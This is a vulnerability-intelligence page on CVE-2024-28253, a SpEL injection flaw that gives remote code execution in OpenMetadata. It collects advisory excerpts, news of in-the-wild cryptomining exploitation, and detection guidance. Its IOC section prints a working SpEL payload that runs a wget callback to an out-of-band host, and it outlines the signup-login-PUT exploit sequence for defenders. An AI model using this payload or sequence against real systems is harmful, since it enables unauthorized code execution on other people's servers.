CVE-2024-28253
published 2024-03-15CVE-2024-28253: OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team…
PriorityP183high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.53%
95.7th percentile
OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-252`. This issue may lead to Remote Code Execution and has been addressed in version 1.3.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| open-metadata | openmetadata | < 1.3.1 | 1.3.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandT(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('{{base64("wget http://{{interactsh-url}}")}}')))
othershodan:http.favicon.hash:733091897
otherfofa:icon_hash="733091897"
- →Monitor for unauthenticated or low-privilege PUT requests to /api/v1/policies containing SpEL expressions with Java runtime invocations (e.g., T(java.lang.Runtime).getRuntime().exec) in the 'condition' field of policy rules. ↗
- →The exploit flow involves three steps: (1) POST /api/v1/users/signup to register a new user, (2) POST /api/v1/users/login to obtain a Bearer token, (3) PUT /api/v1/policies with a malicious SpEL condition. Detect this sequence in HTTP logs.
- →Detect the authorization header pattern 'Bearer <token>' on PUT /api/v1/policies requests from newly registered accounts (accounts created moments before the exploit attempt).
- →Look for outbound DNS or HTTP callbacks (OAST/interactsh interactions) originating from OpenMetadata containers following PUT /api/v1/policies requests, indicating successful SpEL RCE.
- →In Kubernetes environments, enumerate OpenMetadata pods and check image versions prior to 1.2.4/1.3.1 as actively exploited targets: kubectl get pods --all-namespaces -o=jsonpath='{range .items[*]}{.spec.containers[*].image}{"\n"}{end}' | grep 'openmetadata' ↗
- →Post-exploitation indicators include cronjob creation for persistence, Netcat reverse shell connections, and outbound connections to a remote server in China for cryptomining payload download. ↗
- →The SpEL injection payload uses Base64-encoded commands passed to T(java.util.Base64).getDecoder().decode() within the 'condition' field — alert on policy rule conditions containing 'T(java.' class references.
- ·The authorization check (authorizer.authorize()) is called AFTER prepareInternal() and SpEL expression evaluation, meaning even authenticated low-privilege users can trigger RCE before authorization is enforced. ↗
- ·The vulnerability affects OpenMetadata versions prior to 1.2.4 and 1.3.1. The NVD advisory references fix in 1.3.1 while the BleepingComputer article states patches were available in 1.2.4 and newer — ensure the correct patched version is confirmed for your release branch. ↗
- ·Default credentials on OpenMetadata deployments increase risk; attackers can self-register new accounts via /api/v1/users/signup (no prior authentication required) to obtain a token for exploitation. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck9.4CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
ghsa·2024-04-23
CVE-2024-28253 [CRITICAL] CWE-94 OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
**Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability**
`CompiledRule::validateExpression` is also called from [`PolicyRepository.prepare`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113)
```java
@Override
public void prepare(Policy policy, boolean update) {
validateRules(policy);
}
...
public void validateRules(Policy policy) {
List rules = policy.getRules();
if (nullOrEmpty(rules)) {
throw new IllegalArgumentE
OSV
OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
osv·2024-04-23
CVE-2024-28253 [CRITICAL] OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)
**Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability**
`CompiledRule::validateExpression` is also called from [`PolicyRepository.prepare`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113)
```java
@Override
public void prepare(Policy policy, boolean update) {
validateRules(policy);
}
...
public void validateRules(Policy policy) {
List rules = policy.getRules();
if (nullOrEmpty(rules)) {
throw new IllegalArgumentE
VulnCheck
OpenMetadata SpEL Injection in PUT /api/v1/policies
vulncheck·2024·CVSS 9.4
CVE-2024-28253 [CRITICAL] OpenMetadata SpEL Injection in PUT /api/v1/policies
OpenMetadata SpEL Injection in PUT /api/v1/policies
OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`.
Affected: Netlify
No detection rules found.
Nuclei
OpenMetaData - SpEL Injection in PUT /api/v1/policies
nuclei·CVSS 8.8
CVE-2024-28253 [HIGH] OpenMetaData - SpEL Injection in PUT /api/v1/policies
OpenMetaData - SpEL Injection in PUT /api/v1/policies
OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`. This vulnerabilit
Wiz
Crying Out Cloud - May 2024 Newsletter | Wiz
blogs_wiz·2024-05-06·CVSS 10.0
[CRITICAL] Crying Out Cloud - May 2024 Newsletter | Wiz
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
## 🔎 Highlights
Architecture Risks that May Compromise AI-as-a-Service Providers
Wiz research recently performed a security audit of Hugging Face and discovered several security issues that would have allowed an actor running a specially-crafted malicious model on Hugging Face's infrastructure to achieve remote code execution and cross-tenant access to other customers' spaces or models. All these issues were remediated by Hugging Face and no customer action is required.
Learn more in our blog .
## 🐞 High Profile Vulnerabilities
DoS Vulnerability in HTTP/2 CONTINUATION Frames
Bleepingcomputer
Hackers hijack OpenMetadata apps in Kubernetes cryptomining attacks
blogs_bleepingcomputer·2024-04-17·CVSS 9.4
[CRITICAL] Hackers hijack OpenMetadata apps in Kubernetes cryptomining attacks
## Hackers hijack OpenMetadata apps in Kubernetes cryptomining attacks
## Sergiu Gatlan
In an ongoing Kubernetes cryptomining campaign, attackers target OpenMetadata workloads using critical remote code execution and authentication vulnerabilities.
OpenMetadata is an open-source metadata management platform that helps data engineers and scientists to catalog and discover data assets within their organization, including databases, tables, files, and services.
The security vulnerabilities exploited in these attacks ( CVE-2024-28255 , CVE-2024-28847 , CVE-2024-28253 , CVE-2024-28848 , and CVE-2024-28254 ) were reported on December 14 by GitHub Security Lab's Alvaro Muñoz and patched on January 5 in OpenMetadata versions 1.2.4 and newer.
According to Collate CTO and OpenMetadata project m
https://codeql.github.com/codeql-query-help/java/java-spel-expression-injectionhttps://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6grhttps://codeql.github.com/codeql-query-help/java/java-spel-expression-injectionhttps://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6gr
2024-03-15
Published
Exploited in the wild